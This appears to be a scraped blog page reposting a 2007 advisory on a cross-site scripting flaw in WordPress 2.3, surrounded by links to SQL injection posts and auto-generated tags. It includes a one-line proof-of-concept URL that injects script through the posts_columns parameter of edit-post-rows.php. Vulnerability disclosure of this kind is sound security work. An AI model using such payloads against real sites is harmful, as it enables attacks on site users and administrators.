RSS FullRecent Posts
- Michael Sharman - chapter31 » cfqueryparam does not work in ORDER …
- PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection …
- MySQL Dumper | Dropsec
- PHP Security: SQL Injection | Zend PHP 5 Certification Blog
- PHP Security: SQL Injection | Zend PHP 5 Certification Blog
Recent Comments
- luca on XSS in mysql_error()
- Jacob Tuscon on SQL Power Injector 1.2 released - TechRepublic
- MySQL Security » MySQL Security Update Fixes Restrictions Bypass and Library … on MySQL Security Update Fixes Restrictions Bypass and Library ...
[waraxe-2007-SA#059] - XSS in WordPress 2.3
Published by | Filed under email-post, rsd, adl, asap, permanent-link, utf, atom, xss, edit-me, edit-post, bugtraq-security-focus
“register_globals” must be “on” for this exploit to be successful. Proof of concept:. http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=alert(123);. //—–> See ya soon and have a nice day
See the rest here: [waraxe-2007-SA#059] - XSS in WordPress 2.3
adl asap atom bugtraq security focus edit me edit post email post permanent link rsd […]
October 27th, 2007. Comment now »
